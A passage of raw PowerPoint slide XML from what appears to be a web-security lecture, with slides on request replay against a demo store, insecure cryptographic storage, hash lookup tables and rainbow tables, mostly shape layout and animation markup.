          <p:cNvPr id="683" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2384213" y="3998524"/>
            <a:ext cx="1503681" cy="891823"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1503680" cy="891822"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="681" name="2ObjectC01" descr="2ObjectC01"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId7">
              <a:extLst/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="1503681" cy="891823"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="682" name="Request"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="99342" y="185137"/>
              <a:ext cx="1073669"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2400">
                  <a:latin typeface="Arial Narrow"/>
                  <a:ea typeface="Arial Narrow"/>
                  <a:cs typeface="Arial Narrow"/>
                  <a:sym typeface="Arial Narrow"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>Request</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="684" name="Shape"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="4011420">
            <a:off x="7355840" y="3905955"/>
            <a:ext cx="600570" cy="42220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69" y="6987"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="18381" y="7089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21600" y="7243"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15992" y="3609"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12046" y="1126"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10281" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9865" y="307"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8619" y="1126"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5192" y="3634"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="7243"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6023" y="6987"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10281" y="21600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15369" y="6987"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="687" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5247075" y="6353386"/>
            <a:ext cx="1503681" cy="891823"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1503680" cy="891822"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="685" name="2ObjectC01" descr="2ObjectC01"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId7">
              <a:extLst/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="1503681" cy="891823"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="686" name="Request"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="99342" y="185137"/>
              <a:ext cx="1073669"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2400">
                  <a:latin typeface="Arial Narrow"/>
                  <a:ea typeface="Arial Narrow"/>
                  <a:cs typeface="Arial Narrow"/>
                  <a:sym typeface="Arial Narrow"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>Request</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="688" name="Attacker gets hold of the User Request…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7267786" y="7712568"/>
            <a:ext cx="3468388" cy="930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1300480">
              <a:defRPr sz="2400">
                <a:latin typeface="Arial Narrow"/>
                <a:ea typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
                <a:sym typeface="Arial Narrow"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr i="1" sz="1800"/>
              <a:t>Attacker gets hold of the User Request</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr algn="l" defTabSz="1300480">
              <a:defRPr sz="2400">
                <a:latin typeface="Arial Narrow"/>
                <a:ea typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
                <a:sym typeface="Arial Narrow"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr i="1" sz="1800"/>
              <a:t>and replays it on the www.IBuySpy.com</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr algn="l" defTabSz="1300480">
              <a:defRPr sz="2400">
                <a:latin typeface="Arial Narrow"/>
                <a:ea typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
                <a:sym typeface="Arial Narrow"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr i="1" sz="1800"/>
              <a:t>server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="689" name="Title"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1334346" y="110631"/>
            <a:ext cx="10512214" cy="973103"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" defTabSz="1300480">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr b="1" sz="4200">
                <a:latin typeface="Arial Narrow"/>
                <a:ea typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
                <a:sym typeface="Arial Narrow"/>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683"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="683"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="68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xit" nodeType="afterEffect" presetSubtype="32" presetID="23" grpId="2" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="11" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="683"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="683"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="13" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="68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3" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="17" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="684"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="684"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="684"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="20" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="21" presetClass="entr" nodeType="afterEffect" presetSubtype="16" presetID="23" grpId="4" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="22" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="680"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="680"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="24" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="680"/>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6" presetID="23" grpId="5" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="28" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="687"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="29" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="687"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="30" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="687"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="31" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="32" presetClass="entr" nodeType="afterEffect" presetSubtype="4" presetID="22" grpId="6" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="33" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="688"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="wipe(down)" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="34" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="688"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="35" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="36" presetClass="exit" nodeType="afterEffect" presetSubtype="32" presetID="23" grpId="7" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="37" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="687"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="38" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="687"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="39" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="68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3" grpId="1"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="683" grpId="2"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="687" grpId="5"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="688" grpId="6"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="684" grpId="3"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="687" grpId="7"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="680" grpId="4"/>
    </p:bldLst>
  </p:timing>
</p:sld>
</file>

<file path=ppt/slides/slide1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38" name="Image" descr="Image"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2705100" y="2749550"/>
            <a:ext cx="7594600" cy="4254500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1"/>
</p:sld>
</file>

<file path=ppt/slides/slide1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0" name="Appendix"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Appendix</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1"/>
</p:sld>
</file>

<file path=ppt/slides/slide1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2" name="A7 : Insecure Cryptographic Storage"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="523804" y="4231077"/>
            <a:ext cx="11704321" cy="2144888"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>A7 : Insecure Cryptographic Storage</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="174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46" name="hash   | password…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1194615" y="5128242"/>
            <a:ext cx="4682751" cy="1552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914400">
              <a:defRPr sz="2400">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>hash 		| password</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" defTabSz="914400">
              <a:defRPr sz="2400">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>----------------------+-----------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" defTabSz="914400">
              <a:defRPr sz="2400">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>"5f4dcc3b..." 	| "password"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" defTabSz="914400">
              <a:defRPr sz="2400">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>"acbd18db..." 	| "foo"</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1747" name="Lookup Table"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5477432" y="1299146"/>
            <a:ext cx="1925710"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Lookup Table</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1748" name="Maps hash to password directly"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1016404" y="3351572"/>
            <a:ext cx="4389411"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Maps hash to password directly</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1749" name="Image" descr="Image"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6732282" y="1803999"/>
            <a:ext cx="6068907" cy="7513886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1"/>
</p:sld>
</file>

<file path=ppt/slides/slide1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1" name="Lookup Table"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Lookup Table</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1752" name="Lookups are CPU efficient.…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Lookups are CPU efficient.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Lookups are space inefficient</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="928687" indent="-471487">
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:t>All passwords &lt;= 7 chars (95^7, 70 Trillion)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="928687" indent="-471487">
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:t>Requires 1.5 PetaBytes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17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5" name="Rainbow Table"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Rainbow Table</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1756" name="Time/Space Tradeoff…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Time/Space Tradeoff</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Slower than a Lookup Table</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Uses Much less storage</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Most (99.9%) passwords &lt;= 7 chars</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Requires only 64 GB</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t> - Chain length of 71,000</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17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60" name="Image" descr="Image"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
